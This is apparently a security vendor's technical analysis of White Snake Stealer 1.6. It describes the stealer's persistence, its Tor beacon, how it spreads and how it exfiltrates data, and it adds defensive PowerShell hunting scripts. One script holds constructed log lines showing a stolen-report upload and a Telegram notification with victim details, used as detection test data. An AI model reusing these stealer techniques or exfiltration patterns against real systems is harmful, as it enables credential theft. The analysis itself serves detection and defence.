Malware built to steal sensitive information has become a significant problem in the cybercrime landscape. Known as information stealers or data stealers, these programs are written to infiltrate computer systems and extract valuable data such as personal information, login credentials, financial details and intellectual property.
Cybercriminals use various tactics to distribute information stealers, and once installed on a victim’s device, these malware programs operate discreetly, often evading detection by security software. Information stealers target a wide range of applications, including web browsers, email clients, instant messaging platforms, and financial software.
The stolen data is usually sold on underground marketplaces or used for illegal activities like identity theft, financial fraud, corporate espionage, or blackmail. The financial motivation behind information stealers, combined with their ability to collect sensitive data from numerous victims, makes them appealing to cybercriminals.
In February 2023, a new information stealer called White Snake emerged, joining the list of threats in this category. In this blog we delve into the technical aspects of the updated White Snake Stealer version 1.6 to describe its behaviour and its latest capabilities.
White Snake targets a wide set of applications, including cryptocurrency wallets, FTP clients and email clients, and can execute commands on the victim's system, for example to take screenshots or capture webcam images. It has been under continuous development since its first appearance, and its authors' Telegram announcements point to further capabilities being added.
Samples on public repositories that carry these added features strongly suggest that new versions of White Snake are being actively distributed in the cybercrime scene.
White Snake Stealer is offered for both Windows and Linux systems. However, we have not found any sample targeting Linux; every sample we identified targets Windows, and those samples are the ones exhibiting the advanced features described below.
White Snake Stealer has undergone significant improvements, introducing the following key features:
These enhancements highlight the stealer's continuing evolution and adaptability and make it a significant threat to user privacy and security.
The malware applies string obfuscation throughout its code base to deliberately obscure the code, which makes the underlying strings hard to recover and raises the cost of analysis.
The figure above shows the method responsible for deobfuscating strings within the stealer's code base; it is called from almost everywhere, which slows analysis. The stealer also contains deliberately redundant code, adding further layers to untangle.
During execution of the stealer's Main() method, an anti-VM routine is invoked to stop the malware from running inside a virtual machine. It issues Windows Management Instrumentation (WMI) queries for the system's "Manufacturer" and "Model" values (both are properties of the Win32_ComputerSystem class) and compares them with a built-in list of strings associated with virtual machines. On a match the malware exits without doing anything further. Analysts who want to run the sample inside a VM therefore need to present manufacturer and model values that do not appear on that list.
The stealer achieves persistence by copying itself into a directory under AppData and creating a scheduled task that runs the copy; it then deletes the original file to cover its tracks. Different versions create differently named directories.
The figure below shows the stealer creating a directory named "EsetSecurity" and copying itself into it. The directory name varies across variants.
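The persistence pattern just described (a scheduled task whose action points at a copy of the binary under a user's AppData tree) is straightforward to hunt for. The script below is an added example written for this post; it is not code from the original article or from the White Snake sample. The only assumption it makes is a default profile layout of C:\Users\<name>\AppData\, which is what the path regex encodes; directory names such as "EsetSecurity" vary between variants, so nothing keys on the name.

```powershell
# Added example (not from the original post or the White Snake sample): list
# scheduled tasks whose action runs an executable from a user's AppData tree.
# Needs the ScheduledTasks module (Windows 8 / Server 2012 and later); run
# elevated to see every user's tasks.

function Find-AppDataTasks {
    param(
        # Regex for "lives under some profile's AppData". The literal path form is
        # an assumption about a default profile layout (C:\Users\<name>\AppData\).
        [string]$PathPattern = '^C:\\Users\\[^\\]+\\AppData\\'
    )

    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            # Only "Execute" actions carry an executable path; COM handler and
            # e-mail actions do not, so skip those.
            if (-not $action.Execute) { continue }

            # Expand %APPDATA%-style variables and strip quotes before matching.
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute).Trim('"')
            if ($exe -notmatch $PathPattern) { continue }

            $info = $task | Get-ScheduledTaskInfo
            [pscustomobject]@{
                TaskName    = $task.TaskName
                TaskPath    = $task.TaskPath
                Author      = $task.Author
                Execute     = $exe
                Arguments   = $action.Arguments
                # The sample deletes its original file after copying itself, so a
                # task whose target no longer exists is itself worth a look.
                FileExists  = Test-Path -LiteralPath $exe
                LastRunTime = $info.LastRunTime
                NextRunTime = $info.NextRunTime
            }
        }
    }
}

Find-AppDataTasks | Sort-Object TaskPath, TaskName | Format-Table -AutoSize
```

Legitimate software occasionally schedules updaters from AppData, so treat hits as leads rather than verdicts: a task created by a non-administrator account, a freshly created directory with a product-like name, and a target that has already run once are the combination to look for.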
The latest version of the stealer introduces a beacon feature that runs over the Tor network. It is built from the following components:
Through this channel, served by an HttpListener, the attacker can issue commands to the stealer or pull stolen data from the victim's machine. Requests from the attacker travel over Tor to the hidden service, which is configured on port 80 and forwards to port 2392 on the local machine, where the stealer's HttpListener processes and answers them.
Once a request arrives from the threat actor (TA), the stealer looks for HTTP requests that use the POST method, since the commands are carried in the request body rather than in the URL.
For each POST it extracts the body, which holds the command to run (collect sensitive data, perform a specific operation on the victim's machine, or start further malicious activity), interprets it and executes it. This gives the TA remote control over the stealer's behaviour on the compromised system.
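The local end of this beacon leaves a footprint that is easy to miss: a .NET HttpListener does not own a socket itself but registers a URL prefix with the kernel HTTP driver (http.sys), so a socket view shows the listening port as belonging to PID 4 (System) rather than to the stealer. The script below, an added example written for this post and not taken from the article or the sample, checks both views. The loopback port 2392 is taken from the text; the netsh request-queue query is the standard way to map an http.sys prefix back to the user-mode process that registered it.

```powershell
# Added example (not from the original post or the White Snake sample): find
# who is listening on the beacon port, from both the socket and the http.sys side.

function Get-BeaconPortEvidence {
    param([int]$Port = 2392)   # port the hidden service forwards to, per the post

    # 1. Socket view. For an HttpListener this reports PID 4 (http.sys), which is
    #    why the second view is needed.
    Get-NetTCPConnection -State Listen -LocalPort $Port -ErrorAction SilentlyContinue |
        ForEach-Object {
            $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            if ($_.OwningProcess -eq 4) { $detail = 'owned by http.sys; see the http.sys rows' }
            else                        { $detail = $proc.Path }
            [pscustomobject]@{
                Source       = 'socket'
                LocalAddress = $_.LocalAddress
                Port         = $_.LocalPort
                Pid          = $_.OwningProcess
                Process      = $proc.ProcessName
                Detail       = $detail
            }
        }

    # 2. http.sys view. netsh prints each request queue with its attached
    #    "Process IDs:" block before its registered URL prefixes, so the lines
    #    leading up to a prefix such as HTTP://127.0.0.1:2392/ carry the PID.
    netsh http show servicestate view=requestq verbose=yes 2>$null |
        Select-String -Pattern ":$Port/" -Context 30, 0 |
        ForEach-Object {
            # Lines that are nothing but a number inside the preceding context are
            # the process IDs attached to that queue.
            $pids = @($_.Context.PreContext |
                      Where-Object { $_ -match '^\s*\d+\s*$' } |
                      ForEach-Object { $_.Trim() })
            $names = @($pids | ForEach-Object {
                (Get-Process -Id $_ -ErrorAction SilentlyContinue).ProcessName })
            [pscustomobject]@{
                Source       = 'http.sys'
                LocalAddress = $_.Line.Trim()
                Port         = $Port
                Pid          = $pids -join ','
                Process      = $names -join ','
                Detail       = 'URL prefix registered with http.sys'
            }
        }
}

Get-BeaconPortEvidence | Format-Table -AutoSize
```

If more than one request queue falls inside the 30-line context window, the PID list can include the previous queue's processes; read the raw netsh output in that case. A user-mode process running from a profile directory that has registered a loopback prefix on an unusual port, alongside a Tor client process, is the combination that matches the beacon described above.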
The updated version of the stealer includes an expanded set of command capabilities, allowing it to perform the following actions:
The stealer now includes a USB spread capability: it queries the system for removable disks and copies itself onto each one it finds.
The updated stealer also includes a local user spread capability. It iterates over the user profiles on the machine and copies itself into each user's Startup folder, so the copy is executed whenever that user logs in. Writing into another user's profile requires write access to that profile, so this works when the stealer runs with administrative rights or the profile directories are weakly protected; where it succeeds, it gives the malware a foothold in every account on the compromised system.
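Both spread mechanisms above amount to the same binary being copied into a handful of well-known places, which makes a hash comparison across those places a good first check. The script below is an added example written for this post, not code from the article or from the sample. It assumes the standard per-user Startup folder path under each profile and uses the Win32_LogicalDisk DriveType value 2 for removable media; the extension list is a reasonable choice, not something the post specifies.

```powershell
# Added example (not from the original post or the White Snake sample): hash every
# executable-looking file in per-user Startup folders and in the root of removable
# drives, then group by hash. One hash in several of these places is the signature
# of a binary copying itself around.

function Get-SpreadCandidates {
    $locations = [System.Collections.Generic.List[string]]::new()

    # Per-user Startup folders (fixed path relative to each profile directory).
    foreach ($userDir in Get-ChildItem -Path 'C:\Users' -Directory -ErrorAction SilentlyContinue) {
        $startup = Join-Path $userDir.FullName 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
        if (Test-Path -LiteralPath $startup) { $locations.Add($startup) }
    }

    # Root of every removable drive (DriveType 2 in Win32_LogicalDisk).
    foreach ($disk in Get-CimInstance Win32_LogicalDisk -Filter 'DriveType = 2') {
        $locations.Add($disk.DeviceID + '\')
    }

    foreach ($dir in $locations) {
        Get-ChildItem -LiteralPath $dir -File -Force -ErrorAction SilentlyContinue |
            Where-Object { $_.Extension -in '.exe', '.scr', '.com', '.bat', '.vbs', '.lnk' } |
            ForEach-Object {
                [pscustomobject]@{
                    Path   = $_.FullName
                    Size   = $_.Length
                    Sha256 = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
                    # Hidden attribute is a common trick for drops on removable media.
                    Hidden = [bool]($_.Attributes -band [IO.FileAttributes]::Hidden)
                }
            }
    }
}

$candidates = @(Get-SpreadCandidates)

# Same hash in more than one location: a self-copying binary.
$candidates | Group-Object Sha256 | Where-Object Count -gt 1 | ForEach-Object {
    Write-Host "Same binary in $($_.Count) locations (SHA-256 $($_.Name)):"
    $_.Group | ForEach-Object { Write-Host "    $($_.Path)" }
}

# Everything else still deserves a look; Startup folders are normally empty.
$candidates | Sort-Object Sha256, Path | Format-Table Path, Size, Hidden, Sha256 -AutoSize
```

Run it elevated so that other users' profile directories are readable; from a standard account the Startup folders of other users are typically not visible, which is also the reason the local-user spread needs elevated rights to succeed in the first place.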
The malware exhibits the capability to extract sensitive information from various types of applications:
Furthermore, the malware gathers additional information about the victim's system: the username, computer name, public IP address, screen size, CPU, GPU, RAM, disk, model, OS information, running processes and the execution timestamp. These data points give the attacker a profile of the victim's system that can be used for further analysis or exploitation.
Once the data is gathered, the malware serializes it with XmlSerializer, compresses the result and encrypts it with RSA. The RSA key used for encryption is embedded in the binary. Because that is the public half of the operator's key pair, a report recovered from disk or from a network capture cannot be decrypted by defenders; only the private key held by the attacker can open it.
The stealer then tags the encrypted blob with a filename of the form Username@Computername_report.wsr and uploads it to a server controlled by the attacker using the WebClient class's UploadData method with the HTTP PUT method; the destination IP addresses are hardcoded in the binary. An outbound PUT of a *_report.wsr body to a bare IP address is therefore a useful network indicator.
To notify the attacker that data has been exfiltrated, the malware sends a message to a Telegram chat by issuing an HTTP GET request to the Telegram Bot API.
The message is passed URL-encoded in the request URL. Decoding it reveals the URL of the stolen data and the victim's details, which lets the attacker access and exploit the information directly.
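The two network artifacts above (the PUT of a *_report.wsr blob and the Telegram Bot API GET with the notification in its query string) can be pulled out of ordinary web-proxy logs. The script below is an added example written for this post, not code from the article or the sample. The log lines are constructed for the example: 198.51.100.10 and 203.0.113.5 are documentation addresses, the bot token is a placeholder, and the message text follows the shape the post describes (report URL plus victim details) rather than being copied from a real sample. sendMessage is the Bot API method a GET notification like this would normally call; the post itself does not name the method.

```powershell
# Added example (not from the original post or the White Snake sample): flag the
# report upload and decode the Telegram notification from proxy log lines.

# Constructed sample log lines: "timestamp client method url status bytes".
$logLines = @(
    '2023-07-12T10:14:02Z 10.0.0.21 PUT http://198.51.100.10/jdoe@DESKTOP-7H2K_report.wsr 200 48213',
    '2023-07-12T10:14:03Z 10.0.0.21 GET https://api.telegram.org/bot123456789:PLACEHOLDER_TOKEN/sendMessage?chat_id=-1001234567890&text=New%20report%0AUser%3A%20jdoe%40DESKTOP-7H2K%0AIP%3A%20203.0.113.5%0AURL%3A%20http%3A%2F%2F198.51.100.10%2Fjdoe%40DESKTOP-7H2K_report.wsr 200 221',
    '2023-07-12T10:15:40Z 10.0.0.33 GET https://www.example.com/ 200 1024'
)

function Find-StealerTraffic {
    param([string[]]$Lines)

    foreach ($line in $Lines) {
        $f = $line -split '\s+'
        if ($f.Count -lt 6) { continue }
        $ts, $client, $method, $url = $f[0..3]

        # Artifact 1: HTTP PUT of a "<user>@<host>_report.wsr" blob, typically to a bare IP.
        if ($method -eq 'PUT' -and $url -match '/(?<name>[^/]+_report\.wsr)$') {
            [pscustomobject]@{
                Time = $ts; Client = $client; Kind = 'report-upload'
                Detail = "$($Matches.name) -> $(([uri]$url).Host)"
            }
            continue
        }

        # Artifact 2: Telegram Bot API call with the notification in the query string.
        if ($url -match '^https?://api\.telegram\.org/bot(?<token>[^/]+)/(?<api>\w+)\?(?<query>.*)$') {
            $token = $Matches.token
            $api   = $Matches.api
            $params = @{}
            foreach ($pair in $Matches.query -split '&') {
                $k, $v = $pair -split '=', 2
                if ($null -eq $v) { $v = '' }
                # Percent-decoding; the encoding seen here does not use '+' for spaces.
                $params[[uri]::UnescapeDataString($k)] = [uri]::UnescapeDataString($v)
            }
            [pscustomobject]@{
                Time = $ts; Client = $client; Kind = "telegram-$api"
                # Only the numeric bot id is printed; the secret part of the token stays out of reports.
                Detail = "bot $($token.Split(':')[0]) chat $($params['chat_id']) text: " +
                         ($params['text'] -replace "`n", ' | ')
            }
        }
    }
}

Find-StealerTraffic -Lines $logLines | Format-List
```

On the constructed input this yields two hits from the same client a second apart: the report upload to the bare IP and the decoded notification whose text contains that same report URL. That pairing, rather than either request alone, is the pattern to alert on; a legitimate Telegram bot will not be preceded by a PUT of a .wsr file.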
All Quick Heal customers are protected against this threat through the following signature:
White Snake Stealer is an evolving threat that is actively developed and distributed under the Malware-as-a-Service (MaaS) model. The threat actors behind it keep improving the code and adding techniques to bypass detection. This ongoing development underlines the persistent and evolving nature of the threat landscape and the need for individuals and organizations to stay current on security practices, deploy robust defense mechanisms and maintain strong cybersecurity hygiene.